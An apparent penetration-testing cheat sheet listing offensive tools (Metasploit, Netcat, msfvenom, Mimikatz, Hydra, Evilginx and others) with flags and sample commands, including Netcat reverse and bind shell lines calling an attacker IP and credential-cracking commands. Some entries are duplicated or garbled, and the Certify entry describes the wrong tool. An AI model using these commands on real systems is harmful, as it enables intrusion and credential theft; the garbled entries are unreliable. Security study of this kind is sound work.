Definition: An open-source penetration testing framework that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Exploit Modules: Contains numerous exploit modules for a variety of vulnerabilities.
Payloads: Offers various payloads, such as Meterpreter, to interact with the exploited system.
Auxiliary Modules: Includes tools for scanning, fuzzing, and more.
Example: Using Metasploit to exploit a known vulnerability in an outdated web application and gain shell access.
msfconsole → Launches the Metasploit console, which is the primary interface for interacting with the Metasploit Framework.
search [keyword] → Searches the Metasploit database for exploits, payloads, and auxiliary modules matching the keyword.
use [exploit_path] → Selects the exploit module to use. Example: use exploit/windows/smb/ms17_010_eternalblue.
Definition: A versatile networking utility that reads and writes data across network connections using the TCP/IP protocol.
Port Scanning: Basic functionality for port scanning.
Data Transfer: Can be used for transferring files.
Reverse Shells: Can set up reverse or bind shells for remote access.
Example: Using Netcat to set up a reverse shell to a compromised system.
Port scanning
Banner grabbing
File transfer
Creating reverse and bind shells
Debugging and network diagnostics
-l: Listen mode, for inbound connects
-p: Local port number
-e: Program to execute after connection occurs
-n: Numeric-only IP addresses, no DNS
-v: Verbose mode
-u: UDP mode
-z: Zero-I/O mode (used for scanning)
Bind Shells:
A bind shell sets up a listener on the victim machine and waits for an incoming connection. Once a connection is established, the attacker can execute commands on the victim machine.
Victim → nc -l -p [port] -e /bin/bash → Setting up a listener
Attacker → nc [victim_IP] [port] → Connecting to the listener
Reverse Shell:
A reverse shell, instead of listening for a connection, initiates a connection back to the attacker’s machine. This is useful when the victim machine is behind a firewall or NAT.
Attacker → nc -l -p [port] → setting up a listener
Victim → nc [attacker_IP] [port] -e /bin/bash → connecting back to the attacker’s machine
Definition: A network scanning tool used for discovering hosts and services on a computer network.
Port Scanning: Identifies open ports on target systems.
Service Detection: Determines what services are running on open ports.
Operating System Detection: Identifies the OS of target systems.
Nmap Scripting Engine (NSE): Extends Nmap’s capabilities by using scripts.
Example: Scanning a network to identify open ports and running services with Nmap.
-sP (or -sn): Ping Scan - Discover live hosts without performing a port scan.
-p: Specify Port(s) - Scan specific ports.
-p-: Scan all 65535 ports.
-sT: TCP Connect Scan - Uses the operating system’s network services to establish a connection with the target ports.
-sS: TCP SYN Scan (Default and most popular) - Half-open scan, doesn’t complete the TCP handshake.
-sU: UDP Scan - Scans for open UDP ports.
-sV: Version Detection - Detects service versions running on open ports.
-sX: The XMAS scan is named because all the flags (FIN, PSH, and URG) in the TCP header are set, making it look like a lit-up Christmas tree. It is used to identify listening ports on the target system.
-sF: FIN Scan - Sends TCP packets with the FIN flag set to check if ports are closed or open.
-sN: NULL Scan - Sends TCP packets with no flags set to identify open or closed ports.
-sA: ACK Scan
-O: OS Detection - Identifies the operating system of the target host.
-A: Aggressive Scan - Enables OS detection, version detection, script scanning, and traceroute.
-sC: Default Script Scan - Runs a set of default Nmap Scripting Engine (NSE) scripts.
--script: Run specific NSE scripts.
-oN: Normal output.
-oX: XML output.
-oG: Grepable output.
-oA: Output in all formats (normal, XML, and grepable).
Timing & Performance:
-T0: Paranoid (very slow, good for evading detection).
-T1: Sneaky (slow, good for evading detection).
-T2: Polite (slows down to use less bandwidth and target resources).
-T3: Normal (default).
-T4: Aggressive (faster, uses more bandwidth and resources).
-T5: Insane (very fast, uses maximum bandwidth and resources).
Definition: A collection of Python classes for working with network protocols.
It allows developers to create and manipulate network packets at a low level, making it an essential tool for network administrators, penetration testers, and cybersecurity researchers.
Impacket focuses on providing low-level programmatic access to various protocols such as SMB, MSRPC, and LDAP.
SMB and MSRPC Protocols: Useful for creating custom network tools and performing various tasks in penetration tests.
Scripts: Includes scripts for executing commands on remote systems, dumping secrets, and more.
Example: Using Impacket’s to execute commands on a remote Windows system.
Usage: → Executes commands on remote systems via WMI. → Executes commands on remote systems via SMB. → Executes commands on remote systems via SMB, using the Windows service control manager. → Executes the Mimikatz tool on remote systems to extract credentials. → Requests a TGT (Ticket Granting Ticket) from a Kerberos Key Distribution Center (KDC). → Dumps secrets from a remote machine without executing any agent.
CrackMapExec (CME)
Definition: A post-exploitation tool that helps automate the assessment of large Active Directory networks.
CrackMapExec (CME) is a versatile post-exploitation tool used for assessing the security of large Active Directory networks.
It simplifies the process of evaluating the security posture of networks by providing an easy-to-use interface for a variety of tasks, including credential validation, remote command execution, and more.
Credential Validation: Validates credentials across a network.
Command Execution: Executes commands on multiple systems.
Password Spraying: Automates the password spraying attack.
Example: Using CME to validate credentials and execute commands across an Active Directory environment.
cme [protocol] [target] [options]
smb: SMB protocol (Windows file sharing)
ldap: LDAP protocol (Directory services)
winrm: Windows Remote Management
mssql: Microsoft SQL Server
Definition: Network protocol analyzers used to capture and analyze network traffic.
Packet Capture: Captures live network traffic for analysis.
Filters: Applies filters to focus on specific types of traffic.
Example: Using Wireshark to capture and analyze HTTP traffic to identify sensitive information being transmitted in plaintext.
tcpdump -i eth0 -w capture.pcap
Definition: A tool within the Metasploit framework used to generate payloads.
msfvenom is a command-line utility that is part of the Metasploit Framework. It is used to generate payloads, encode shellcode, and create executable files that can be used in penetration testing and security assessments.
Payload Generation: Creates various types of payloads for different platforms.
Encoding: Encodes payloads to evade antivirus detection.
Formats: Generates payloads in various formats, such as executables, scripts, and more.
Example: Using msfvenom to generate a malicious executable payload that opens a reverse shell.
msfvenom -p [payload] [options]
Windows Meterpreter Reverse TCP: windows/meterpreter/reverse_tcp
Linux Meterpreter Reverse TCP: linux/x86/meterpreter/reverse_tcp
Definition: A tool used for network poisoning attacks.
It works by poisoning name resolution requests and responding with fake answers, tricking clients into sending their authentication data to the attacker.
LLMNR, NBT-NS, and MDNS Poisoning: Intercepts and responds to broadcast requests to capture credentials.
Password Cracking: Can capture and crack hashed passwords.
Example: Using Responder to capture NTLMv2 hashes by poisoning LLMNR and NBT-NS traffic on a Windows network.
sudo python3 -I [interface]
Definition: Hydra is a fast and flexible password-cracking tool used for brute force attacks against a variety of network services.
Brute Force Attacks: Supports numerous protocols for brute force attacks on login services.
Parallel Connections: Allows multiple parallel connections for faster cracking.
Custom Wordlists: Supports custom wordlists for username and password combinations.
Example: Using Hydra to brute force SSH login credentials on a remote server.
hydra [options] [target] [module]
-l [username]: Specifies a single username.
-L [username file]: Specifies a file with a list of usernames.
-p [password]: Specifies a single password.
-P [password file]: Specifies a file with a list of passwords.
-s [port]: Specifies the port to connect to.
-t [tasks]: Specifies the number of parallel connections.
-f: Stops after the first valid login is found.
-v: Enables verbose mode.
-V: Shows the login and password for each attempt.
-o [output file]: Specifies the file to write found logins and passwords.
Example: Using CME to validate domain credentials and execute commands across an Active Directory environment.
cme [protocol] [target] [options]
smb: SMB protocol (Windows file sharing)
ldap: LDAP protocol (Directory services)
winrm: Windows Remote Management
mssql: Microsoft SQL Server
Definition: A tool used for network poisoning attacks.
LLMNR, NBT-NS, and MDNS Poisoning: Intercepts and responds to broadcast queries to capture credentials.
Password Cracking: Captures hashed passwords for offline cracking.
Example: Using Responder to capture NTLMv2 hashes by poisoning LLMNR and NBT-NS traffic on a Windows network.
sudo python3 -I [interface]
Definition: A high-performance password cracking tool.
It is used to crack hashed passwords by utilizing various attack modes and optimizations.
Multi-Platform Support: Runs on various operating systems including Windows, Linux, and macOS.
Various Attack Modes: Supports dictionary attacks, brute-force attacks, mask attacks, and hybrid attacks.
GPU Acceleration: Utilizes GPU to speed up the cracking process.
Example: Using hashcat to perform a dictionary attack on a set of hashed passwords to recover plaintext passwords.
Usage → hashcat [options] [hashfile] [wordlist]
-m [hash type]: Specifies the hash type (e.g., MD5, SHA1).
MD5: -m 0
SHA1: -m 100
SHA256: -m 1400
SHA512: -m 1700
NTLM: -m 1000
bcrypt: -m 3200
-a [attack mode]: Specifies the attack mode (e.g., dictionary, brute-force).
Straight: -a 0 (Dictionary attack)
Combination: -a 1 (Combines words from two dictionaries)
Brute-Force: -a 3 (Exhaustive search of all possible combinations)
Hybrid Wordlist + Mask: -a 6 (Applies masks to a wordlist)
Hybrid Mask + Wordlist: -a 7 (Applies wordlists to masks)
-o [output file]: Specifies the file to write cracked passwords.
--potfile-path [file]: Specifies the path to the potfile for saving cracked hashes.
-r [rule file]: Applies rules to modify or generate passwords.
-t [tasks]: Specifies the number of concurrent threads.
--status: Displays the current status of the cracking process.
John the Ripper
Definition: A fast password cracker available for many operating systems.
Multi-Platform Support: Runs on various operating systems including Unix, Windows, and MacOS.
Cracking Modes: Supports dictionary attacks, brute-force attacks, and rule-based attacks.
Customization: Allows custom rules to refine attack strategies.
Example: Using John the Ripper to crack Unix password hashes extracted from a compromised system.
Usage → john [options] [password file]
--format=[format]: Specifies the hash format (e.g., raw-md5, sha256).
MD5: raw-md5
SHA1: raw-sha1
SHA256: raw-sha256
SHA512: raw-sha512
NTLM: nt
bcrypt: bcrypt
DES: des
--wordlist=[file]: Specifies the path to a wordlist file (dictionary attack).
--rules: Applies rules to the wordlist to generate additional passwords.
--incremental: Enables an incremental brute-force attack.
--status: Displays the current status of the cracking process.
--show: Displays the cracked passwords.
Crack MD5 hashes using a wordlist → john --format=raw-md5 --wordlist=/path/to/wordlist.txt hashfile.txt
Show cracked passwords → john --show hashfile.txt
Definition: A parallelized login cracker that supports numerous protocols.
Protocol Support: Can attack SSH, FTP, HTTP, HTTPS, SMB, and many other services.
Custom Wordlists: Supports custom wordlists for usernames and passwords.
Parallel Connections: Uses multiple connections to speed up the cracking process.
Example: Using Hydra to brute force SSH login credentials on a remote server.
Definition: A tool for analyzing and attacking Active Directory relationships and permissions.
It maps out and visualizes complex AD environments, identifying potential attack paths that could be exploited to gain unauthorized access or escalate privileges.
BloodHound is particularly useful for penetration testers and security professionals to perform AD enumeration and identify security weaknesses in Windows networks.
Graph Database: Uses graph theory to find hidden relationships in Active Directory environments.
Visual Representation: Provides a graphical interface to visualize attack paths.
Query Capability: Allows complex queries to identify potential attack vectors.
Example: Using BloodHound to map out and analyze privilege escalation paths in an Active Directory domain.
-c All: Collects all data categories (users, groups, trusts, etc.).
-d [domain]: Specifies the target domain.
-dc [domain controller]: Specifies the domain controller to query.
-o [output directory]: Specifies the directory to save collected data.
bloodhound -d [domain] -u [username] -p [password] -c all
-d [domain]: Specifies the domain to query.
-u [username]: Specifies the username to use.
-p [password]: Specifies the password for the username.
-c all: Collects all data.
BloodHound analyzes and visualizes the data collected by SharpHound.
Analyze data with BloodHound → bloodhound -i /path/to/output -o /path/to/analysis
Definition: A speed-oriented, parallel, modular, login brute-forcer.
Medusa is a fast, parallel, and flexible password-cracking tool used for brute-forcing login credentials across various network services. I
t is designed to handle large-scale attacks efficiently and supports multiple protocols, making it a valuable tool for penetration testers and security researchers.
Module Support: Supports various modules for different protocols including HTTP, SSH, and FTP.
Parallel Testing: Allows multiple parallel connections to test login credentials quickly.
Customizability: Users can add new modules or modify existing ones.
Example: Using Medusa to perform a brute-force attack on a web application’s login page.
-h [host]: Specifies the target host or IP address.
-U [username file]: Specifies a file with a list of usernames.
-u [username]: Specifies a single username.
-P [password file]: Specifies a file with a list of passwords.
-p [password]: Specifies a single password.
-M [module]: Specifies the protocol or service module to use (e.g., ssh, ftp, http).
ssh: Secure Shell
ftp: File Transfer Protocol
http: Hypertext Transfer Protocol
mysql: MySQL Database
smtp: Simple Mail Transfer Protocol
pop3: Post Office Protocol
imap: Internet Message Access Protocol
rdp: Remote Desktop Protocol
telnet: Telnet Protocol
-t [tasks]: Specifies the number of concurrent connections (threads).
-f: Stops after the first successful login.
-v: Enables verbose output.
Burp Suite
Definition: A comprehensive web application security testing tool.
It provides tools for performing security assessments of web applications, including scanning for vulnerabilities, intercepting and modifying HTTP requests, and analyzing responses.
Intercepting Proxy: Intercepts and inspects HTTP/S traffic between the browser and the target application.
Scanner: Automated vulnerability scanner to identify common web vulnerabilities.
Repeater: Manually modify and resend individual HTTP requests.
Intruder: Automated attack tool for testing inputs and parameters.
Example: Using Burp Suite to intercept and modify HTTP requests to test for SQL injection vulnerabilities in a web application.
Proxy: Intercepts and modifies HTTP/S traffic between your browser and the target application.
Scanner: Automates the process of scanning for vulnerabilities such as SQL injection, XSS, and more (available in the Professional edition).
Spider: Crawls the application to discover and map all its endpoints and functionality.
Intruder: Performs automated attacks on web application inputs to find vulnerabilities (e.g., brute force, fuzzing).
Repeater: Allows you to manually modify and resend individual HTTP requests to analyze responses.
Decoder: Helps decode and encode data in various formats (e.g., URL encoding, Base64).
Comparer: Compares two sets of data to find differences, useful for analyzing changes in responses or request parameters.
Definition: A post-exploitation tool used for extracting plaintext passwords, hashes, PINs, and Kerberos tickets from memory.
It can be used to retrieve plaintext passwords, hash values, and Kerberos tickets from memory.
Mimikatz is commonly used by security professionals for penetration testing and by attackers to escalate privileges or move laterally within a network.
Dump Credentials: Extract passwords and hashes from memory.
Pass-the-Hash: Use NTLM hashes to authenticate without requiring plaintext passwords.
Pass-the-Ticket: Use Kerberos tickets to access services.
Kerberoasting: Extract service tickets from memory for offline cracking.
Golden Ticket: Create and inject forged Kerberos tickets for domain-wide access.
Silver Ticket: Create and inject forged Kerberos service tickets.
Example: Using Mimikatz to dump user credentials from a compromised machine’s memory.
Dump credentials from memory:
Definition: Rubeus is a post-exploitation tool written in C# that interacts with the Kerberos authentication protocol.
It is used for various activities related to Kerberos tickets and authentication, including ticket extraction, manipulation, and forging.
Rubeus is particularly useful for security professionals and attackers in performing advanced Kerberos-based attacks, such as Pass-the-Ticket (PTT), Kerberoasting, and Golden Ticket attacks.
Dump Kerberos Tickets: Extract TGTs (Ticket Granting Tickets) and service tickets from memory.
Pass-the-Ticket: Inject and use Kerberos tickets for authentication.
Kerberoasting: Extract service tickets for offline cracking.
Golden Ticket: Create and inject forged Kerberos tickets for domain-wide access.
Silver Ticket: Create and inject forged Kerberos service tickets.
Ticket Renewal: Renew existing tickets and adjust their expiration.
Example: Using Rubeus to renew an expired Kerberos ticket to maintain access without re-entering credentials.
Dumping Kerberos Tickets: → Rubeus.exe dump
Pass-the-Ticket → Rubeus.exe ptt /ticket:[path_to_ticket]
Definition: Certify is a tool designed for managing and automating the issuance of SSL/TLS certificates, primarily for use in securing web servers and applications.
It integrates with Certificate Authorities (CAs) to automate the certificate issuance process, making it easier to deploy and maintain secure communications.
It is designed to enumerate and collect various system and user information, which can be useful for further exploitation or understanding the target environment.
Seatbelt can identify potential privilege escalation vectors, such as unpatched vulnerabilities or misconfigured permissions.
Certificate Request: Requests certificates with specific attributes.
Certificate Abuse: Exploits misconfigurations in AD CS to escalate privileges.
Example: Using Certify to request a certificate for a privileged account and using it to authenticate as that account.
Definition: Seatbelt is a post-exploitation tool used for information gathering and privilege escalation on Windows systems.
It is designed to enumerate and collect various system and user information, which can be useful for further exploitation or understanding the target environment.
Seatbelt can identify potential privilege escalation vectors, such as unpatched vulnerabilities or misconfigured permissions.
System Enumeration: Gathers detailed information about the system, including installed software, running processes, and security settings.
Credential Enumeration: Identifies potential credentials and sensitive data.
Example: Using Seatbelt to gather information about installed security software and system configurations on a compromised machine.
Usage → Seatbelt.exe
-p: Collects information about potential privilege escalation paths.
-n: Collects network-related information, such as network shares and connections.
-s: Collects system information, including OS version and installed software.
Definition: A task automation and configuration management framework from Microsoft, with a scripting language and a command-line shell.
PowerShell Integrated Scripting Environment (ISE) is a graphical user interface (GUI) for PowerShell, providing a more user-friendly environment for writing, testing, and debugging PowerShell scripts.
Script Editor: A multi-line editor with syntax highlighting for writing and editing PowerShell scripts.
Console Pane: A PowerShell console for executing commands interactively.
Debugging Tools: Built-in tools for debugging scripts, including breakpoints, step execution, and variable inspection.
Integrated Help: Provides context-sensitive help for cmdlets and functions.
Example: Using PowerShell to execute scripts that enumerate system information or deploy malware.
Get-Command: Lists all available cmdlets, functions, workflows, aliases, and scripts.
Get-Help: Provides help documentation for cmdlets and functions.
Get-Process: Retrieves information about running processes.
Set-ExecutionPolicy: Configures the script execution policy.
Invoke-Command: Executes commands on remote systems.
Definition: A command-line tool that allows administrators to execute processes on remote systems.
PsExec is a command-line utility from Microsoft’s Sysinternals suite that allows you to execute processes on remote systems and interact with them as if you were sitting at the console of the remote machine.
It is commonly used for remote administration, troubleshooting, and scripting in Windows environments.
PsExec can be used to run processes with elevated privileges, create remote shells, and execute commands across multiple systems.
Remote Execution: Run commands and executables on remote systems.
Interactive Sessions: Start interactive sessions on remote systems.
Privilege Management: Execute commands with different user privileges, including SYSTEM.
No Installation Required: PsExec does not need to be installed on the remote systems; it runs as a standalone executable.
Example: Using PsExec to run a script on a remote system to deploy malware or extract data.
Run a Command on a Remote System → psexec \\RemotePC -u [username] -p [password] [command]
Run a Command with SYSTEM Privileges → psexec \\RemotePC -s [command]
Redirect Output to a File → psexec \\RemotePC -u [username] -p [password] [command] > output.txt
Execute a Command on Multiple Systems → psexec \\System1,\\System2,\\System3 -u [username] -p [password] [command]
Definition:Evil-WinRM is a Ruby-based tool used for remote management of Windows systems over WinRM (Windows Remote Management).
It is often used in penetration testing and red teaming engagements to exploit WinRM vulnerabilities, gain remote access, and execute commands on target systems.
Evil-WinRM can be employed to perform various administrative tasks, exploit WinRM misconfigurations, and facilitate post-exploitation activities.
Remote Command Execution: Execute commands and scripts on remote Windows systems via WinRM.
Interactive Shell: Provides an interactive command shell on the remote system.
Credential Management: Supports passing credentials for authentication and session management.
File Upload/Download: Allows uploading and downloading files from the remote system.
Example: Using Evil-WinRM to gain a remote shell on a compromised Windows machine and execute commands.
Connecting to a Remote System → evil-winrm -i [IP_ADDRESS] -u [USERNAME] -p [PASSWORD]
Definition: Using legitimate, built-in system binaries to perform malicious actions.
Living Off the Land Binaries (LOLbins) refers to the practice of using legitimate, pre-installed binaries and tools available on a system to achieve objectives like privilege escalation, persistence, or data exfiltration without deploying new, malicious software.
This technique leverages existing system binaries that can be exploited to perform actions typically associated with malicious activities.
The advantage of LOLbins is that they often evade detection by traditional security solutions since they are legitimate system components.
mshta.exe: Executes HTML applications (HTA files) and can be used to execute scripts.
powershell.exe: Executes PowerShell scripts for various tasks.
certutil.exe: Downloads and installs certificates but can be used to download files from the internet.
Purpose: Avoid detection by using trusted system binaries for malicious activities.
Example: Using certutil.exe to download and execute a malicious payload on a compromised machine.
Use Case: Performing security assessments on AWS environments to identify misconfigurations and vulnerabilities.
Example: Testing for weak IAM policies, S3 bucket permissions, and other AWS-specific issues.
Prevention: Regularly audit and review AWS configurations using Pacu to identify and remediate security gaps.
Usage → python3
Docker Bench
Purpose: Security auditing tool for Docker containers
Docker Bench for Security is an open-source script that checks for common best practices around the deployment and configuration of Docker containers in production.
It helps in assessing the security of Docker installations against the benchmarks provided by the Center for Internet Security (CIS).
Security Checks: Runs a series of checks to ensure Docker is securely configured.
CIS Benchmark: Aligns with the CIS Docker Benchmark recommendations.
Detailed Reports: Provides detailed reports on the findings and recommendations.
Automated and Manual Use: Can be run manually or integrated into automated security workflows.
Use Case: Checking Docker configurations against security best practices.
Example: Ensuring Docker daemon configuration is secure, container settings are appropriate, and security options are enabled.
Prevention: Run Docker Bench regularly to ensure Docker containers are configured securely.
Usage → sh
Purpose: Kubernetes security auditing tool.
Kube-hunter is an open-source tool designed to perform security assessments on Kubernetes clusters.
It identifies potential security issues and vulnerabilities in Kubernetes environments, helping administrators and security professionals secure their clusters.
Automated Scanning: Automatically scans Kubernetes clusters for security vulnerabilities.
Extensive Coverage: Checks for a wide range of security issues, including misconfigurations and exposed services.
Detailed Reports: Provides detailed reports on discovered vulnerabilities and potential security issues.
Interactive and Network Scanning: Supports both interactive (direct access) and network scanning modes.
Use Case: Scanning Kubernetes clusters for security issues and misconfigurations.
Example: Identifying open ports, insecure configurations, and vulnerabilities in a Kubernetes environment.
Prevention: Use Kube-hunter to regularly scan Kubernetes clusters and address identified issues to enhance cluster security.
Scans the network for Kubernetes clusters → kube-hunter --remote <TARGET_IP>
Purpose: AWS security best practices assessment tool.
Prowler is an open-source tool designed to perform security best practices assessments, audits, incident response, continuous monitoring, and compliance checks on AWS environments.
It helps ensure that your AWS accounts adhere to the best practices and compliance standards set by organizations like the Center for Internet Security (CIS), General Data Protection Regulation (GDPR), and others.
Key Features:
Security Assessments: Conducts security best practices assessments based on AWS CIS Benchmark.
Compliance Checks: Includes checks for GDPR, HIPAA, ISO 27001, and more.
Automated and Manual Use: Can be used interactively or integrated into CI/CD pipelines.
Detailed Reporting: Generates detailed reports with findings and recommendations.
Use Case: Auditing AWS accounts for security best practices and compliance.
Example: Checking IAM policies, S3 bucket configurations, CloudTrail logs, and other AWS resources.
Prevention: Implement Prowler to continuously monitor AWS environments for security compliance and best practices.
ScoutSuite is an open-source multi-cloud security-auditing tool that helps assess the security posture of cloud environments.
It supports AWS, Azure, Google Cloud Platform (GCP), and other cloud providers.
ScoutSuite uses the cloud providers’ APIs to gather configuration data and then analyzes the information to provide a comprehensive report on security issues and best practices.
Multi-Cloud Support: Audits AWS, Azure, GCP, and other cloud environments.
Comprehensive Reporting: Generates detailed reports highlighting security issues and recommendations.
Easy to Use: Simple CLI interface for easy execution.
Customizable: Allows customization of checks and reporting.
Interactive Reports: Produces interactive HTML reports for better visualization of findings.
Use Case: Assessing the security posture of cloud environments such as AWS, Azure, and Google Cloud.
Example: Identifying misconfigurations, insecure policies, and other security risks across different cloud platforms.
Prevention: Utilize ScoutSuite to perform regular security audits across multi-cloud environments and remediate identified risks.
Scanning an AWS Environment → scoutsuite aws --profile <AWS_PROFILE>
Scanning an Azure Environment → scoutsuite azure --subscription <SUBSCRIPTION_ID>
Purpose: Tools provided by cloud vendors for security assessment and monitoring.
Cloud-native vendor tools are provided by cloud service providers like AWS, Azure, and Google Cloud Platform (GCP) to help users manage, monitor, and secure their cloud environments.
These tools are designed to work seamlessly with their respective cloud platforms, providing deep integration and extensive features.
Use Case: Utilizing built-in cloud services for security management and compliance.
AWS Security Hub: Centralized security management for AWS.
Azure Security Center: Unified security management and advanced threat protection.
Google Cloud Security Command Center: Security and risk management for Google Cloud resources.
Prevention: Leverage these cloud-native tools to continuously monitor and improve the security posture of cloud environments, ensuring compliance and detecting potential threats.
Purpose: Automates the discovery of web proxy configuration files
The Web Proxy Auto-Discovery Protocol (WPAD) is a protocol used by clients to automatically locate a proxy configuration file, typically called wpad.dat, which provides the settings needed to connect to the internet through a proxy server.
This protocol helps in managing proxy settings across a large network and simplifies the configuration process for end-users.
Automatic Proxy Configuration: Allows clients to automatically discover and configure the appropriate proxy settings without manual intervention.
Ease of Management: Simplifies the management of proxy settings across a network by centralizing the configuration.
Support for Multiple Platforms: Works with various operating systems and web browsers that support automatic proxy configuration.
Use Case: Can be used maliciously to redirect traffic through a malicious proxy.
Example: Attacker sets up a rogue WPAD server to intercept and monitor web traffic.
Prevention: Disable WPAD in network settings and enforce the use of secure proxies.
Purpose: Framework for rogue access point attacks.
WiFi-Pumpkin is an open-source framework for conducting wireless network security assessments and attacks.
It is designed to facilitate various wireless network attacks, such as creating rogue access points, performing man-in-the-middle (MITM) attacks, and capturing network traffic.
WiFi-Pumpkin provides a user-friendly interface and powerful tools for network penetration testing and auditing.
Rogue Access Point Creation: Allows the creation of fake access points to lure unsuspecting users.
Man-in-the-Middle (MITM) Attacks: Facilitates intercepting and manipulating network traffic.
Network Traffic Analysis: Captures and analyzes network packets.
Credential Harvesting: Captures login credentials from victims connecting to the rogue access point.
Plugins and Extensions: Supports various plugins for extending functionality.
User-Friendly Interface: Provides a graphical user interface (GUI) for ease of use.
Use Case: Creating fake access points to capture user credentials and data.
Example: Setting up a fake hotspot named “Free WiFi” to lure users and intercept their data.
Prevention: Educate users to avoid suspicious Wi-Fi networks, use VPNs, and implement secure Wi-Fi settings.
Usage → python3
Purpose: Suite of tools for assessing Wi-Fi network security.
Aircrack-ng is a suite of tools designed for analyzing and cracking WEP and WPA/WPA2 wireless network security.
It is widely used by security professionals and enthusiasts for testing the security of wireless networks.
Aircrack-ng is powerful for conducting various types of wireless network attacks, including packet sniffing, decryption, and cracking encryption keys.
Packet Capture: Captures and analyzes packets from wireless networks.
Cracking Encryption: Cracks WEP and WPA/WPA2 encryption keys using captured packets.
Injection: Supports packet injection for attacking and testing networks.
Monitoring: Monitors and analyzes wireless traffic.
Compatibility: Works with various wireless adapters that support monitoring and injection.
airmon-ng: A tool to enable monitor mode on wireless interfaces.
airodump-ng: Captures packets from wireless networks.
aireplay-ng: Injects packets into the network for various attacks.
aircrack-ng: Cracks WEP and WPA/WPA2 encryption keys using captured packets.
airbase-ng: Creates fake access points.
airtun-ng: Creates virtual network interfaces.
packetforge-ng: Creates custom packets for injection.
Use Case: Cracking WEP and WPA-PSK keys to gain unauthorized access to Wi-Fi networks.
Example: Using Aircrack-ng to capture packets and crack the encryption key of a nearby Wi-Fi network.
Prevention: Use strong WPA3 encryption, complex passwords, and regularly update network security settings.
Purpose: Database of Wi-Fi networks globally, mapped by geographic location. (Wireless Geographic Logging Engine) is a web-based service that provides a platform for mapping and analyzing wireless networks worldwide.
It collects and aggregates data from users who log wireless network information, including Wi-Fi access points, their locations, and other relevant details. is commonly used for discovering the geographic distribution of Wi-Fi networks and for research purposes related to wireless network security and geolocation.
Wireless Network Mapping: Visualizes the location and distribution of Wi-Fi access points on a map.
Data Collection: Aggregates data from users who submit wireless network information.
Search and Filtering: Allows users to search for specific networks and filter results based on various criteria.
AP Data: Provides detailed information about access points, including SSID, MAC address, and encryption type.
Download Data: Users can download collected data for offline analysis.
Use Case: Finding and analyzing the distribution of Wi-Fi networks.
Example: Searching for Wi-Fi networks in a specific area to find vulnerable networks.
Prevention: Secure Wi-Fi networks with strong encryption and avoid broadcasting SSIDs in public places.
Purpose: Wi-Fi network scanner.
InSSIDer is a wireless network scanner and analyzer tool developed by MetaGeek.
It is designed to help users analyze and troubleshoot wireless networks by providing detailed information about Wi-Fi access points and network performance.
InSSIDer is commonly used by network administrators, security professionals, and enthusiasts to optimize wireless network performance and diagnose connectivity issues.
Network Discovery: Scans and lists available Wi-Fi networks, displaying detailed information about each network.
Signal Strength: Provides real-time signal strength readings to help identify weak or strong signals.
Channel Analysis: Analyzes and visualizes channel usage to identify congestion and optimize channel selection.
Interference Detection: Identifies potential sources of interference and helps in mitigating issues.
Historical Data: Tracks and displays historical data on network performance for trend analysis.
Network Visualization: Displays networks on a graph to visualize signal strength, channel usage, and network distribution.
Use Case: Analyzing Wi-Fi networks to optimize performance and security.
Example: Identifying overlapping channels and signal strength issues in a home or office network.
Prevention: Regularly scan and optimize Wi-Fi networks to ensure optimal security and performance.
Purpose: Wireless network detector, sniffer, and intrusion detection system.
Kismet is an open-source wireless network detector, sniffer, and intrusion detection system.
It is designed to capture and analyze wireless network traffic, making it a valuable tool for network administrators, security professionals, and enthusiasts.
Kismet supports a wide range of wireless devices and can be used to detect and investigate wireless network security issues, including unauthorized access points and client devices.
Wireless Network Detection: Identifies and maps wireless networks, including hidden networks.
Packet Capture: Captures and logs wireless packets for analysis.
Network Visualization: Provides detailed visualization of network traffic and device locations.
Intrusion Detection: Detects unauthorized access points and potential security threats.
Multi-Interface Support: Supports multiple wireless interfaces for comprehensive monitoring.
Plugin Support: Extensible with various plugins for additional functionality.
Use Case: Monitoring wireless traffic and detecting unauthorized access points.
Example: Using Kismet to detect rogue access points and suspicious activity in a corporate network.
Prevention: Implement continuous monitoring with tools like Kismet to identify and mitigate unauthorized wireless activity.
Purpose: Framework for social engineering penetration tests.
Social Engineering Toolkit (SET) is an open-source framework designed for social engineering attacks.
Developed by TrustedSec, SET is a popular tool used by penetration testers and security professionals to simulate social engineering attacks and assess the effectiveness of security awareness training.
SET provides a variety of attack vectors and techniques, allowing users to craft and execute sophisticated social engineering campaigns.
Phishing Attacks: Create and deploy phishing emails, websites, and malicious attachments.
Credential Harvesting: Capture login credentials through fake login pages and credential harvesters.
Exploit Delivery: Deliver exploits and payloads using social engineering techniques.
Payload Generation: Generate malicious payloads and executables for various platforms.
Pre-Built Templates: Use pre-configured attack templates for common social engineering scenarios.
Integration: Integrates with Metasploit and other tools for advanced attack capabilities.
Use Case: Creating phishing campaigns and other social engineering attacks.
Example: Simulating a phishing email to test an organization’s security awareness.
Usage: This command starts the SET framework and presents an interactive menu. → sudo setoolkit
Purpose: Phishing simulation tool.
Gophish is an open-source phishing framework designed for creating, managing, and analyzing phishing campaigns.
It allows security professionals and researchers to simulate phishing attacks to assess the effectiveness of security training and identify vulnerabilities in organizations.
Gophish provides a user-friendly interface for setting up phishing campaigns, tracking results, and analyzing the success of various phishing tactics.
Campaign Management: Create, manage, and track phishing campaigns with ease.
Template Creation: Design and customize phishing emails and landing pages.
Tracking and Analytics: Monitor user interactions with phishing emails and landing pages, including clicks and form submissions.
Reporting: Generate detailed reports on campaign performance and user responses.
Multi-User Support: Allow multiple users to manage and run campaigns with different access levels.
Use Case: Creating and managing phishing campaigns to test user susceptibility.
Example: Sending simulated phishing emails to employees to gauge their response.
Usage: By default, Gophish will start and listen on port 3333 for the web interface and port 8080 for the API. → ./gophish
Purpose: Advanced phishing tool.
Evilginx is an open-source phishing framework designed to perform advanced phishing attacks using reverse proxy techniques.
It is specifically used for bypassing two-factor authentication (2FA) protections by intercepting authentication tokens and session cookies.
Evilginx allows attackers to create realistic phishing sites that can capture credentials and session tokens, providing access to protected accounts even if 2FA is enabled.
Reverse Proxy: Acts as a man-in-the-middle to intercept and relay requests between the victim and the legitimate service.
2FA Bypass: Captures session cookies and authentication tokens to bypass two-factor authentication.
Customizable Phishing Pages: Allows the creation of phishing pages that mimic legitimate login interfaces.
Credential and Token Harvesting: Captures usernames, passwords, and session tokens.
Real-Time Logging: Provides real-time logs of captured credentials and tokens.
Use Case: Performing man-in-the-middle attacks to capture credentials.
Example: Setting up a proxy to intercept login credentials from a phishing site.
Purpose: Information gathering tool.
theHarvester is an open-source information-gathering tool designed for reconnaissance and information retrieval during security assessments.
It is used to collect email addresses, domain names, and other relevant information from various public sources and databases.
